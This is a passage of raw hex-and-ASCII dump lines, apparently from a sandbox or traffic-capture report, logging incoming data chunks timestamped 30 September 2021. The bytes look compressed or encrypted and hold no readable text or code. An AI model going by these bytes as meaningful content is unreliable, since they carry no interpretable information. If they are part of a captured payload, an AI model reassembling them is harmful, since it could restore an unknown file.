69 79 2c cb 0e cd 33 3e e8 78 a2 d7 46 47 d4 1c 28 cb ed 04 ed 0c 18 17 59 70 2a 61 44 a9 c9 c8 9c ec 69 b6
                                                                  Data Ascii: Eg27d '4N@EdN%Ny!)%=,.]2(]e/FNc"?f<zTC~<Yp /H)gN=TO!xoG,n?QE)SV;!e}m6ajGZ$iY>r.7&-yiy,3>xFG(Yp*aDi
                                                                  2021-09-30 21:52:28 UTC4160INData Raw: b3 cb 5d 06 48 13 84 04 01 8f 6d 3f d6 42 63 ca 8f 9e 57 b7 31 09 15 6f 5b e4 62 3f b9 b5 d9 e9 ef f5 83 df ff 1e f7 72 58 f9 f5 6e 88 12 1d 1c 28 71 19 f7 1c 24 e5 98 4f 13 3e 7c 2c 8a a4 d7 ad 90 b6 73 e6 ec dd f5 ff f5 15 67 6b 7c 34 32 85 7e 03 62 d2 62 67 03 87 71 75 2f 30 cf a6 d6 b8 ed c0 c4 81 1e f7 1a 68 fb 14 d9 70 46 03 1d 1c e5 73 00 8e 3b e9 30 0a c9 b6 9b d1 b9 8e 06 e9 c3 b9 72 10 3a 8b d6 7f b3 87 f9 43 e1 21 96 d9 59 5f 9d ce fe 09 21 cf 41 5d cf 62 61 2c 6b 0b ea 87 35 e5 45 6d f9 3b b1 bc b9 d2 95 0b 09 66 ed c3 cb a2 4a 9e 01 33 ba a4 98 9f c3 f2 6a 6d b7 a0 8c a4 a8 e4 45 c3 be 8e b0 5e ee 5c 48 b5 fe 43 7d 26 97 bd 4b 5e 9e 61 11 31 b8 f4 4d 8b b0 34 2d 45 ab 04 af d7 11 43 19 11 76 f1 38 30 c0 42 55 5a e4 95 05 d7 ff 35 a6 1e 5d 90
                                                                  Data Ascii: ]Hm?BcW1o[b?rXn(q$O>|,sgk|42~bbgqu/0hpFs;0r:C!Y_!A]ba,k5Em;fJ3jmE^\HC}&K^a1M4-ECv80BUZ5]
                                                                  2021-09-30 21:52:28 UTC4176INData Raw: 15 55 78 54 92 66 f5 4d 9f 7a b7 57 c9 77 c5 df c3 09 0c 5c df fb 15 ef 84 e1 15 57 ba a8 0d 38 a0 de df 1e a4 b8 dc 40 cc f2 db ee 48 e3 59 06 d2 ad fb 95 f9 cb d8 42 44 99 59 52 9d 14 1d 31 86 4a fd 5c 42 17 24 9e d5 88 99 4c e4 66 84 77 2b 67 f5 27 ba 9e 4d 89 d2 29 5a ca 04 73 43 39 f6 dd ea 92 df 53 21 82 9a bf 46 05 de 8f ab 0c 8c 32 8f 22 05 39 4f e5 03 6b 1a 00 88 ce 80 0e fb 09 66 3f 44 73 db 94 47 f4 44 c6 87 6e 0b 6e 82 ac 68 52 27 63 01 60 aa 6b 12 65 7c d2 b4 8a 90 66 2e 99 04 25 53 ad 9b 78 35 a4 a7 b5 e6 24 ba d2 87 27 47 83 ec 73 a0 6f cc 97 e0 fe f6 84 f6 62 2a 04 53 cc 33 ff cb 06 ac 02 62 ec 30 5d 62 ab d5 57 53 cf b4 83 8e f0 45 96 13 ea 22 a4 fc 84 ff e1 59 ee f9 7e af 37 12 c0 c8 c7 0b 09 ac 79 97 62 9e e5 28 33 68 aa de 8d cb 2c 08
                                                                  Data Ascii: UxTfMzWw\W8@HYBDYR1J\B$Lfw+g'M)ZsC9S!F2"9Okf?DsGDnnhR'c`ke|f.%Sx5$'Gsob*S3b0]bWSE"Y~7yb(3h,
                                                                  2021-09-30 21:52:28 UTC4192INData Raw: 1b 82 62 20 20 cf d3 c4 f3 3f be 7f 80 e3 e3 87 f7 e3 7b 08 fd 68 4d 39 be 68 4b 60 1b f0 9b c9 19 8a 27 0d 28 b0 46 1e e1 3e e5 27 45 db e8 06 9a 35 26 c2 c6 04 56 b9 a6 cb 70 3c 7b 6b 62 4b e2 0f 66 61 ce 29 e7 ea 96 bc 4c 12 bc 38 ce 52 db 58 2a ce 44 2c 09 fc e7 4d 15 59 94 1b 85 d9 36 d8 ab 31 77 be 7b 6c 5d 54 63 5a 46 41 f1 08 76 4a 9f 45 c5 42 fa c2 8d 0b e3 fe bb 42 ae c5 ac 8e 7b 57 a3 48 a2 3b 06 5b 8c 75 df ca 5f 43 40 f3 68 fd 26 5b 6a ad be eb cc 3c 45 45 3d bd f6 62 6e e6 aa 68 fb 65 b8 7f 25 94 59 bd 62 b3 0c e5 ab 5f b8 9b 53 77 bd 42 a2 70 21 0a ff 6c 96 31 cb e8 21 b7 b0 fb 39 f1 12 f0 bd 70 bb de 00 bf 76 a9 9e 44 66 1d b8 a8 1a 4f 8e ff 3e e2 6f bc 78 7e ab 93 77 66 22 b6 09 4f 30 80 60 67 4d 6c 41 f9 c7 43 10 f6 b3 e9 8a 40 92 2e a2
                                                                  Data Ascii: b ?{hM9hK`'(F>'E5&Vp<{kbKfa)L8RX*D,MY61w{l]TcZFAvJEBB{WH;[u_C@h&[j<EE=bnhe%Yb_SwBp!l1!9pvDfO>ox~wf"O0`gMlAC@.
                                                                  2021-09-30 21:52:28 UTC4208INData Raw: 3a 26 9e 32 09 74 3a 94 69 bc 00 df 45 a1 b4 32 d8 09 76 74 00 60 2c ca ae b0 9c 9c ad 3f dc db b4 5c 9e 96 ad fb 02 aa cb 12 e4 8c 4d 8c ac 82 92 bd cd 6c ea 3c 1c f7 cf d8 4b 35 93 8a b6 6a b9 b9 89 f0 c4 cd 7d 4c fb c0 9d b5 36 1b c4 a2 ae e1 a2 a3 57 b3 e6 b3 7d 00 72 d7 41 35 45 b7 9f 70 16 bd fb 32 86 e0 ff e0 04 b1 c0 8a 1e af 26 ee 90 33 c4 1f 0a 5b a4 8a 45 3f 8a 37 8a 24 60 c1 b6 59 ab 7c 35 6e ed e0 b2 f9 89 bf 31 d8 1c 0f 2d 4b e9 dc b2 5b 48 fa 42 14 d9 82 fb a5 ea 41 91 d4 33 05 d9 7d 47 34 53 17 34 bb fe d2 f9 36 5f ab a2 dd cd d4 f8 88 4f 9d a9 bf cc 3a 2b d0 74 42 ee 9d 22 5b a9 c2 5f e6 5a 47 06 16 c7 67 46 e1 0d 1c 06 5b 46 d3 93 78 08 0c 6f a8 64 6a bd 90 c7 9b bf 40 20 9b 72 a8 46 3f 02 78 00 9a 5d ff 30 a2 24 6f de 80 36 2a 0a 92 2d
                                                                  Data Ascii: :&2t:iE2vt`,?\Ml<K5j}L6W}rA5Ep2&3[E?7$`Y|5n1-K[HBA3}G4S46_O:+tB"[_ZGgF[Fxodj@ rF?x]0$o6*-
                                                                  2021-09-30 21:52:28 UTC4224INData Raw: 30 02 58 7e 15 be 46 36 e1 9f cb 1a e8 f0 32 bf fb d2 22 49 32 79 e5 99 0c 76 e8 57 b0 30 5e 3f c2 4e a5 ca 3c c4 d8 f3 75 4e ba dd 1e a1 14 be 1a 53 e5 e1 e4 04 58 e0 93 81 57 c6 a7 0b c2 cb 4a c8 fc c6 01 f1 f6 40 46 5c 50 4e 4c 3c 15 f2 19 66 59 19 d9 13 2c 52 b3 46 b7 66 59 71 92 9c a1 95 23 42 b4 1e 35 70 83 3a 32 54 21 dc 97 5f 8d 53 81 ad c5 9b db b9 f5 c2 d2 6c 8b 3d 8c 6b 09 12 da d1 08 cb e5 4a 4e 0d 31 c4 7e eb 4c f4 23 ab 9d e7 ef 0c 82 e6 76 36 45 06 77 f3 2d 85 f3 0a 7a b7 2e 38 9d 09 c1 29 fe 04 74 fa e4 0f c7 98 a3 4b 79 f8 47 3d fb fd f4 aa 31 76 b3 0e ca 91 62 e7 a1 3b 07 58 67 c7 13 a4 7f 31 de dd 7f b5 a1 31 cc cc cf 24 3c a4 02 62 90 80 3f 2d e2 7e 31 ac ae 20 17 26 9c 86 d0 d6 ff e1 c3 16 58 58 c9 21 80 41 bf 19 51 f0 8c 06 d4 89 ba
                                                                  Data Ascii: 0X~F62"I2yvW0^?N<uNSXWJ@F\PNL<fY,RFfYq#B5p:2T!_Sl=kJN1~L#v6Ew-z.8)tKyG=1vb;Xg11$<b?-~1 &XX!AQ
                                                                  2021-09-30 21:52:28 UTC4240INData Raw: d7 3c 1e 9f d8 8b f3 a6 97 1d 5e ed 80 36 cc 58 f4 56 80 db 9f 62 59 29 33 30 b4 51 d1 56 ae e3 37 6a 86 5b 13 24 ec 1b ea 9a 58 55 ca 98 cd 9d 98 bd dd 52 13 c4 32 b0 38 60 f5 b5 33 70 85 4f bf 87 45 02 b6 ed 3e f4 c3 9a 60 82 d4 43 33 52 44 fa f7 da 33 6b 29 1e 98 86 77 14 04 72 5d 4b 29 e6 19 29 65 e7 61 11 a2 29 06 f7 50 ae 3f 51 40 58 16 9c 7b d4 a7 3e f9 12 c5 d6 ab 3c a8 b6 15 10 72 d5 f8 55 5f 91 45 77 93 a9 2d ce 63 fd 34 db c0 62 7b d9 72 c7 58 c4 a0 09 83 db 21 6c a7 4c 7f 30 c3 69 08 b0 b3 7b 24 35 ee fb 7c 90 10 ed d2 66 bf 9f 5f d6 71 6c 2a 7e db db 9d 89 83 b1 c6 02 b5 34 01 4c 38 75 0c fa 2a 82 33 03 0c 02 c1 88 83 fc fb 6c 69 f6 29 57 d4 b2 6e c4 0b da 9a 2b 55 b0 cc c5 03 69 ee 04 1f 16 ff 51 d2 ff 17 31 43 a2 cc eb d2 8e c9 fd 12 d9 6f
                                                                  Data Ascii: <^6XVbY)30QV7j[$XUR28`3pOE>`C3RD3k)wr]K))ea)P?Q@X{><rU_Ew-c4b{rX!lL0i{$5|f_ql*~4L8u*3li)Wn+UiQ1Co
                                                                  2021-09-30 21:52:28 UTC4256INData Raw: b6 8e 7f fd 13 e8 56 35 02 85 6b d0 ad 3e 64 e2 92 a3 c6 6b 57 fb 6d f6 03 54 69 20 7c 50 a6 e1 41 d5 3c 93 77 92 1f 8f f0 32 d5 bf 40 55 48 4d a7 64 a7 4e 6f 39 c7 55 f6 b1 85 03 bf f2 93 f3 ce 6f 73 c1 ab a4 c5 fb 8f 91 39 e5 7b d9 1f 71 bd f7 b0 c4 f9 ba c8 8d cd f4 9c 5c 6f 05 63 98 bb bf 0d fa 4e 34 05 0d 5e 49 7c 59 71 67 c0 1d 10 96 71 14 08 e6 3d df f2 f5 f4 95 e8 5b 5f 10 27 f8 f3 b4 d5 7f 1e 7a 99 2f f8 38 60 43 f7 87 90 ae fa 27 95 ee 1a 4a 96 9a e5 18 77 6f 97 67 fa e9 e3 42 7c 92 c0 77 99 26 40 4e ed 3f 66 03 b4 a4 22 7c 0a 8c e4 06 c5 0c 4b 15 98 1c bd 60 02 01 b7 40 e6 b0 1a 7a 73 5f 95 0b 24 d5 be 3d b1 2b e6 e0 be e1 67 5f a4 e2 58 3a aa 22 66 7d 15 36 ab 44 bc db cc 50 74 2b d4 9c 6f 4f 6e 19 d4 64 ed 1c e1 9c 56 9f 46 0a 43 e3 58 1e 27
                                                                  Data Ascii: V5k>dkWmTi |PA<w2@UHMdNo9Uos9{q\ocN4^I|Yqgq=[_'z/8`C'JwogB|w&@N?f"|K`@zs_$=+g_X:"f}6DPt+oOndVFCX'
                                                                  2021-09-30 21:52:29 UTC4272INData Raw: 6d 73 21 7d 40 47 3b 99 cb 3e 18 f8 36 8c 5a 72 0d 3b 46 0f 34 55 12 e2 f9 99 de 97 d2 31 09 e4 b9 72 88 f1 ce 5b 6c 05 bb 2e 62 d3 c9 c8 b6 f3 39 a0 88 46 bf 6e e7 bc ca 89 1c c9 ea be 0f 25 21 9d be c8 80 39 e8 f2 38 8b b8 03 c6 bb ce 3d 1a a3 a7 6f 1d 54 7f 74 b0 98 75 18 8b 03 66 c3 00 01 eb 6e 0b 93 4c 06 a6 71 ae 53 4e 54 2c 36 b6 97 0a 66 ef fd 3c 84 17 7e 84 20 b5 10 1e ac 97 8c 7f 0c 08 d3 6d ff c1 e1 31 0a 71 44 be 73 04 d3 3a fa 2e 43 aa a4 c9 e5 c6 b5 83 f7 c8 96 c2 16 dd 5b 91 6e cc dd 9a 71 73 dc 6b fb 2d 67 2a e9 8c ca f0 3e d6 b4 95 da b8 b9 c2 ee a4 40 ee e0 0c 7d ab 48 b0 42 4e 14 b8 73 9f 1c 85 37 6b 3c 51 d4 85 9a bb d0 e7 4d 87 5b 1f b7 9e d4 f2 52 9f db 95 73 5f 8a b4 7a 86 2e a7 57 d8 83 ff 8d 77 c2 a4 63 ab 6f d7 11 09 16 bb b1 27
                                                                  Data Ascii: ms!}@G;>6Zr;F4U1r[l.b9Fn%!98=oTtufnLqSNT,6f<~ m1qDs:.C[nqsk-g*>@}HBNs7k<QM[Rs_z.Wwco'
                                                                  2021-09-30 21:52:29 UTC4288INData Raw: db 97 2e 33 11 82 f7 ac 0d b5 b4 9a 7e b9 29 00 92 0e 6b ec 03 99 a0 1c 63 d3 4d 6d f1 ae 2b 82 0a 06 d1 4a e1 37 31 22 83 e1 64 f1 f0 c6 6c c8 91 2d 41 9f 48 1c 14 e5 b8 d9 05 5b 86 53 f3 08 81 23 b2 31 de 98 6d 8e 11 ac 61 22 11 1f ec 04 ac 86 13 24 d8 b2 16 14 ba 0f 0d 5a 08 a0 cb 06 12 bf 0b 1a 08 9c a0 b7 6b 56 0a 67 cc c7 09 bb f5 e9 db 97 86 aa 8f a1 ba 2e 9b 7d 76 57 6c c3 e7 5d f9 3c 1c 6c 19 10 64 ce 3b 39 05 57 a6 88 d1 0e c2 2b c2 ea fb a3 7b 96 f6 4a 31 f5 8f 05 a1 d9 97 90 d4 4b f9 42 2e 74 e5 d9 90 3b a2 62 29 57 22 a1 f8 48 df 0d 54 53 fd 6f 9a e3 20 05 6c af 28 46 4b 5b c5 b4 a0 19 32 92 2d f2 e7 33 e2 99 9b 58 50 69 1d 83 b2 5e e6 a3 87 86 81 4d 89 4d 51 68 e9 ed c1 48 cb ef 90 97 78 da 46 4c 69 2b 0e 79 de ba 35 44 4a e1 d4 28 67 2f 51
                                                                  Data Ascii: .3~)kcMm+J71"dl-AH[S#1ma"$ZkVg.}vWl]<ld;9W+{J1KB.t;b)W"HTSo l(FK[2-3XPi^MMQhHxFLi+y5DJ(g/Q
                                                                  2021-09-30 21:52:29 UTC4304INData Raw: 96 b9 d3 a7 ba 52 b1 67 fa c9 d0 82 e5 bc 91 87 f5 e0 69 b2 00 7f 17 08 26 1c a7 bc 63 47 5a e2 86 e3 82 80 9d 33 05 9d b9 06 81 8f ea 83 0b 8e c9 bb 1c f7 c9 3c f3 6f d8 29 ed 67 21 1f cb 9d 00 f2 dc 05 1f f1 ff ad 39 a6 b5 33 62 41 16 0d 05 40 a3 36 ea 6d bc 2a 73 2e 0b 67 fd 8e 7c ce d9 7a c4 20 90 65 cc 56 37 1c ea 98 48 92 f9 c4 1b 45 74 73 a2 1f a8 18 26 35 e3 40 5b c4 4c 3d a6 ae 3f fb db 17 18 56 2a 5c e7 13 29 5c a8 e7 8e 4e 2c 3b 16 42 d1 c7 64 38 5d 9b 13 f8 03 19 fd e1 d1 a5 16 16 c9 77 7a d1 4f aa 68 f0 ac 48 bd 33 fb 8c 3e 2d 13 20 72 de 25 13 c4 5b 9e 09 61 b5 b8 e3 ea 9e 64 31 51 da 30 3c 83 b9 ac b9 19 e0 20 99 40 5c a0 4a 7f d7 88 d2 43 fa 3d 13 92 a3 25 df 7d df d0 bc 7f 2a 07 86 2c 0c d2 97 12 21 bf 38 17 b8 f2 5d dc 5a 68 c4 7c 5c ac
                                                                  Data Ascii: Rgi&cGZ3<o)g!93bA@6m*s.g|z eV7HEts&5@[L=?V*\)\N,;Bd8]wzOhH3>- r%[ad1Q0< @\JC=%}*,!8]Zh|\
                                                                  2021-09-30 21:52:29 UTC4320INData Raw: 7b 77 15 5c 88 f9 0d ab c7 19 11 f3 7a 8e 0a d5 35 9e 53 bd d8 ec b3 f8 c9 ca 41 4c 9e ca 59 b5 ec 69 35 78 ed 47 5a fa c1 30 ae 73 2c 87 6d 1e 7a ed 87 cb 39 ec 86 02 4d 0e a7 1a 81 e5 85 6a 52 0a 47 a3 68 b1 0f 9a be 82 7a 59 63 28 9c e1 c5 da 16 0a bc c3 3c df 97 75 3c af 0f 08 41 53 42 bc 3d ab 33 46 9e 38 35 b7 d0 28 3f 87 71 89 57 36 8f 3d c7 c6 41 d8 36 40 e9 dd a6 4c 82 e0 78 92 7b 6d 17 aa 34 76 be c5 b6 f0 8a e8 5a db 12 cb 0a 61 4c ef a1 e2 18 87 5f ac 2d f1 e6 e2 b5 06 dd f3 7e 27 70 25 64 a7 de d0 39 dd 2e 81 ec c4 ee 9e 07 28 d7 0d 27 a9 42 e7 45 ad a5 46 3b a4 e9 e4 c3 60 4c 72 90 48 5c 14 e3 13 50 68 43 c6 e6 84 74 02 2b ee 5e 22 25 b8 e9 6a be 66 45 a6 f4 f4 bf 2a 42 79 ef 59 f1 5d 3d 98 03 d0 1e c0 6c 25 3e 62 83 ad 89 bb a6 be fa 25 6a
                                                                  Data Ascii: {w\z5SALYi5xGZ0s,mz9MjRGhzYc(<u<ASB=3F85(?qW6=A6@Lx{m4vZaL_-~'p%d9.('BEF;`LrH\PhCt+^"%jfE*ByY]=l%>b%j
                                                                  2021-09-30 21:52:29 UTC4336INData Raw: bc e9 80 91 fc 53 83 76 df 08 b4 97 8b 10 ee 72 56 92 90 f5 f5 a5 1c b9 62 fb 94 2a 2f 65 27 88 ee 16 db cf bd ce 9a 94 f6 3d 3b e3 07 34 89 05 20 87 11 fd ce 21 49 f9 a2 be 9c 40 ca 47 c3 62 a0 40 5b 84 84 7b c0 f4 fe 8c d8 e3 80 e9 55 5e a2 25 33 d2 eb d3 70 f9 12 cd 08 42 22 6b 91 4d 26 8d ff a2 c1 4b 7b c9 7f ee 83 77 41 54 db e1 32 57 cc 54 10 34 9f b5 10 4a 8b 22 52 07 79 74 c2 1e 35 ba 20 7a 3b 41 ca 92 ae 53 7d ec 37 81 ba e0 6d 64 cf 74 33 8f ee 07 b7 c2 bd fb a6 ad 7c 1d a4 c4 53 66 66 dc 15 b8 a5 e0 0b 5b e9 0e 14 de ea 5f 1f 2c be 4a a9 8d e7 43 e6 98 7f 9d 5f 8d 5f c2 aa bf 14 6a 65 e3 fd 77 17 04 cf 40 b3 b5 b8 f1 f4 d0 3d f5 d0 a2 43 a3 12 10 44 a4 b2 4c 8b bb 42 ea ff 1e 2c 48 a9 d1 60 82 ea 87 84 6f 08 cc 0a 95 ae 48 6a d9 31 ab 95 43 ac
                                                                  Data Ascii: SvrVb*/e'=;4 !I@Gb@[{U^%3pB"kM&K{wAT2WT4J"Ryt5 z;AS}7mdt3|Sff[_,JC__jew@=CDLB,H`oHj1C
                                                                  2021-09-30 21:52:29 UTC4352INData Raw: cb 60 5f e4 39 a4 09 b4 fa e0 2c 6a ee 61 62 46 00 36 2f 52 55 68 70 40 42 0a f2 8b 56 cc dc 9b 1c 37 19 3c a3 83 f2 2d 21 71 c9 5e 48 4f 21 3a 04 00 01 33 42 58 4b 8c 99 d4 4a a5 a0 39 ca 50 98 d1 a4 6c c2 01 58 68 54 89 69 37 65 89 ce 73 da 80 0e 02 a8 04 67 2c dc d6 79 68 7e f6 ed 71 86 39 fe b8 08 c6 fa e4 0b 77 07 f8 7b fb 9b c4 7b f5 7a 38 66 c1 99 4b 28 34 fc 98 ea 2b ad 92 af 70 83 05 6d ad 16 50 1a cb eb de 7c a1 70 f8 50 1b 47 0a e5 95 69 7c 2c c6 0c 45 91 60 49 9c 79 78 49 56 fe ed 19 80 94 27 6d 77 b2 7c 29 d4 13 da 79 42 3e c7 4b 16 28 e1 c9 a7 b9 e1 93 91 73 1b 3a 8d de 28 43 b9 17 36 c3 a0 ef 6c ca 55 ee 15 af 21 66 09 5d fc 82 5a ab be 70 4f bb 8c 81 89 fb cc 02 a0 f5 a5 14 0a c1 c7 95 1b 47 13 70 38 1a 1d e9 8e c2 79 e7 ad 9c 0a bf 0b c8
                                                                  Data Ascii: `_9,jabF6/RUhp@BV7<-!q^HO!:3BXKJ9PlXhTi7esg,yh~q9w{{z8fK(4+pmP|pPGi|,E`IyxIV'mw|)yB>K(s:(C6lU!f]ZpOGp8y
                                                                  2021-09-30 21:52:29 UTC4368INData Raw: 96 57 e4 81 0d 11 7c 74 d8 64 c1 d5 5c d3 32 5f 99 df 63 b4 0c 62 91 43 70 64 27 2c 63 77 25 04 49 94 8e 76 71 df ce 9d e5 3c ba 9c bb a8 41 47 1a 48 e3 6f fc 91 e0 9e fc 15 da dc 13 10 b4 fb b7 b9 58 7b 33 05 7a 40 9d 52 5d e8 89 bb c2 9d 72 51 9e 4a 05 fa 4e 74 69 17 6b f8 84 9b 1c d7 29 bc eb 87 15 4c ee aa d9 8c b9 79 ca 1b be fc 31 37 69 32 8f 82 02 f0 a6 b8 f1 f9 bf a5 c8 8d 15 d8 67 6c fb bf 5c 3e d2 7e 1a 90 16 d3 93 b4 30 9b dd 87 dc ee 7a 6c ef 93 4f 7e 9e 87 a0 e3 cd 22 85 76 17 ae e0 8c 90 ab d0 4c d4 2d 64 09 ea 5e 62 1a d6 04 b3 a0 25 84 eb 03 17 6b 52 f4 55 c0 a4 7d 23 82 07 e3 34 32 b9 b6 b9 90 cd 70 9b e3 5a 00 56 93 23 3c d1 f4 eb 9a 92 94 48 04 8a d8 0f 7f c3 6f e8 0b b5 41 2b 97 a3 f8 6e 56 f2 6f 6c d7 35 09 1f 54 78 75 1b 1b 09 c8 55
                                                                  Data Ascii: W|td\2_cbCpd',cw%Ivq<AGHoX{3z@R]rQJNtik)Ly17i2gl\>~0zlO~"vL-d^b%kRU}#42pZV#<HoA+nVol5TxuU
                                                                  2021-09-30 21:52:29 UTC4384INData Raw: c6 c6 0f bf 32 8c 33 7a ca 70 d1 b0 03 f6 f1 c2 bf 08 91 1f 6b 15 19 f9 1c 00 8b 61 b9 d2 d2 c1 3f 4e 7c db 5f c0 6d 3b e0 f4 1c f1 ef f1 03 14 ac 63 d3 83 0e 7c 84 27 1a 25 b0 f4 9f 68 86 3c c0 15 99 f4 97 af c2 7d cd de 7d 8a c6 93 ec 1b 4c 06 19 9a bb 45 f1 ae 9e 1e 38 8d 2f 25 25 64 38 ca eb ac c2 a1 e2 26 1d 2b e2 9d 72 4a 85 b2 14 1f 3f 23 8e 97 81 f0 27 9f 41 9b 97 93 1a cc e6 3d 06 81 e4 ba b2 b3 8c 2b 55 07 dd a9 e7 1c a8 dc f7 bf 2e aa 60 80 8a 06 61 49 41 2e f6 e6 5b a0 ab 3e 2f 28 0c f5 4f 0d b0 ed 6f ed 9b 46 13 d3 58 1e dd bc 7f 15 29 75 ba 30 cd cd 74 31 1d 95 a4 e1 46 13 12 58 df 84 e6 01 e3 30 83 bf 99 00 2e e4 4f 34 cc ec 2e e9 15 eb e5 19 43 ca b2 72 be f2 8e bb c0 ae bb ae 25 29 bd 03 76 94 b9 ee a8 0c 72 27 4b a4 5c 7b 5e 7e 6a bc d2
                                                                  Data Ascii: 23zpka?N|_m;c|'%h<}}LE8/%%d8&+rJ?#'A=+U.`aIA.[>/(OoFX)u0t1FX0.O4.Cr%)vr'K\{^~j
                                                                  2021-09-30 21:52:29 UTC4400INData Raw: 8d d8 17 4b 7f ad 4e e1 c5 5c ce 8d 2b 36 3d d3 18 b0 95 50 39 3d 93 c4 a5 66 5b 67 ce 5b 1e 2b af 26 1b 8a ab 67 ef 93 83 dc 9b 77 0a a1 03 c7 e9 42 6d e1 db 79 f2 8c bb 25 3b 8c 3d 02 24 92 af a2 d1 bb 98 a1 37 6d ca fc 09 67 44 54 08 72 13 26 15 c5 2f 76 51 fd e6 26 a7 64 15 fb 71 96 bf 8e d5 bc 3c 31 92 77 15 79 98 59 1c 3e ad e9 4f 37 bb ce f2 6a c9 1f 46 2b 4c 90 9f 8e 26 a2 bc 2b ba 15 48 08 b6 05 e2 4d 72 da 7f da 84 e0 43 c5 9d ce 3a 93 39 ed f8 90 c9 1c 20 2f d4 9c 32 c3 9e a2 ec fa 60 ab fd e2 40 90 4b ea c5 91 f9 67 33 dd ec e4 8d 79 3b ab b4 75 46 e3 95 e0 3a 64 08 86 4e c1 62 0c e3 57 3b 73 f8 9a d7 2e 99 b9 8a 0f 90 b3 af 87 1d 61 9b e9 e4 d1 3d 50 b8 c1 02 cd ba 93 32 bb ec ef e7 21 89 80 9a a3 50 4c 9b 82 55 6f 69 aa ee 21 61 d7 45 f3 f5
                                                                  Data Ascii: KN\+6=P9=f[g[+&gwBmy%;=$7mgDTr&/vQ&dq<1wyY>O7jF+L&+HMrC:9 /2`@Kg3y;uF:dNbW;s.a=P2!PLUoi!aE
                                                                  2021-09-30 21:52:29 UTC4416INData Raw: 08 04 1f 3d 24 a1 71 40 dc 4e e6 5b 23 38 c3 d9 23 fd de ac a1 ec 30 0a 1c 81 3e 0d 61 74 9e 0a 32 86 86 5b 3c 9f 17 8e 1b 82 cf 56 ce d8 b2 6f 30 0a c3 4d f8 2c 0c 2f 67 60 8b 54 96 98 e2 18 50 e6 1f 08 60 92 cb 7c 2a 98 fa ac 75 2c 76 64 64 68 b0 9a 10 15 92 56 13 7c ce fc 2c 9c d4 1d d8 26 db 97 2a 82 bd 62 7c df 23 69 d7 ba 63 6a 46 e8 f3 65 7c 24 53 0f 8b 6f 75 9e b2 d4 67 96 5f 46 e0 4a 9e bf 62 76 85 9f bf 57 9f 4a 07 2f d7 27 c8 e9 2d 16 88 79 82 36 33 e4 5d 56 af a7 36 70 eb f3 f8 77 ff 78 b0 e4 2f 3e 58 49 80 d7 27 27 ce f1 f3 ec 58 c7 58 db 66 46 7c 6a 0d e6 40 d5 40 76 03 e2 22 c2 cd 8c 0a 0a 40 df 12 68 65 e5 a6 22 2a 9c 7a fe 82 d9 77 7a e7 fb 6e 01 35 d1 20 74 71 16 30 9a 80 49 14 cc 68 60 bd 8a 54 a5 93 79 f2 c8 a9 b8 12 2b 00 35 fc fd 17
                                                                  Data Ascii: =$q@N[#8#0>at2[<Vo0M,/g`TP`|*u,vddhV|,&*b|#icjFe|$Soug_FJbvWJ/'-y63]V6pwx/>XI''XXfF|j@@v"@he"*zwzn5 tq0Ih`Ty+5
                                                                  2021-09-30 21:52:29 UTC4432INData Raw: e3 3e 42 e2 30 db b3 d9 41 c0 a8 51 32 ce dc 75 29 a7 42 b4 ea a5 7d 72 3b 4d e7 00 40 80 75 8c fd 28 51 1b b5 2f 47 e9 b0 5c 67 31 3c 9e e9 2e fc c7 77 f3 b4 5e f6 11 c7 4e 0c 74 4b 73 36 a1 13 cc 7c f0 a1 e1 73 cf fd 43 72 75 6d 18 7c 40 39 d3 d0 49 eb 97 32 ae 56 f7 5f c0 84 d6 36 e5 23 8a 75 72 5b b4 b9 f6 ee e5 f4 df e8 ee 8b 43 18 5a a4 ed cb c3 e6 2f fb 2c 4a 68 3a b5 6e 38 39 77 f1 3e e6 1f 29 78 6b b0 77 b6 13 d4 f6 b6 01 d7 29 6f d8 d6 21 19 11 6f 87 71 49 19 00 50 01 39 9c 39 93 f0 66 44 9d 37 de af 65 53 8a 18 60 53 95 3a e6 3f e5 78 46 c3 55 59 91 5e 4e fc 76 c6 53 d3 0b 0c a4 16 75 c0 59 4f 98 53 16 62 d4 49 2a ed 25 f9 a5 a5 12 06 d4 1b 19 92 b2 c2 1c 71 80 31 8b 1e 77 9a 52 fa f3 64 c3 f6 ff 38 7c b3 32 93 9d 48 58 62 a4 b4 a9 fa 5f ea a0
                                                                  Data Ascii: >B0AQ2u)B}r;M@u(Q/G\g1<.w^NtKs6|sCrum|@9I2V_6#ur[CZ/,Jh:n89w>)xkw)o!oqIP99fD7eS`S:?xFUY^NvSuYOSbI*%q1wRd8|2HXb_
                                                                  2021-09-30 21:52:29 UTC4448INData Raw: 82 83 72 79 2b 35 ff 1f 72 41 f2 57 ce 13 dc e0 4a a2 15 1e e8 00 57 a8 c2 b8 1d 6e 99 82 ed 51 97 bc c0 35 61 d7 98 c5 e4 dd d9 db e9 b3 13 2f a5 ec 8b a0 f1 a5 93 8b c7 0e 0f c9 5f 4c 33 d2 48 60 f1 d8 60 d3 9e b4 f1 ae a8 bb 6e cb 9a f6 30 6f b9 27 f7 58 be 55 d4 83 5a 89 66 ae 27 fa 39 c4 3d 48 ca 36 71 ef ba 97 1a c3 f3 9f cd 41 c0 46 19 06 43 d4 60 2e 84 cf 82 69 cc 32 55 96 64 3f 78 b5 fb c1 c2 bd 44 49 18 94 51 c0 44 0b 5d ee 7c 4e 0d 54 50 f0 45 52 d0 ac a9 c8 90 1a a3 0a 34 83 15 2e 42 0b ad 2f a5 6b b5 92 2d 04 a4 72 bc 21 2a c5 d8 4f cb 32 11 20 fc 96 95 af e2 b3 c1 fa a8 80 5d f8 a7 ab 26 6c 35 0f 4f 73 94 5f cc 8b 25 33 d6 36 f9 21 0d c1 74 b2 86 55 22 96 2a a9 e3 fa 4e 23 fe 9a 0c 2c 26 fd d4 59 f2 6f 10 6b 9f 70 22 2e 25 44 7d cb 36 b8 89
                                                                  Data Ascii: ry+5rAWJWnQ5a/_L3H``n0o'XUZf'9=H6qAFC`.i2Ud?xDIQD]|NTPER4.B/k-r!*O2 ]&l5Os_%36!tU"*N#,&Yokp".%D}6
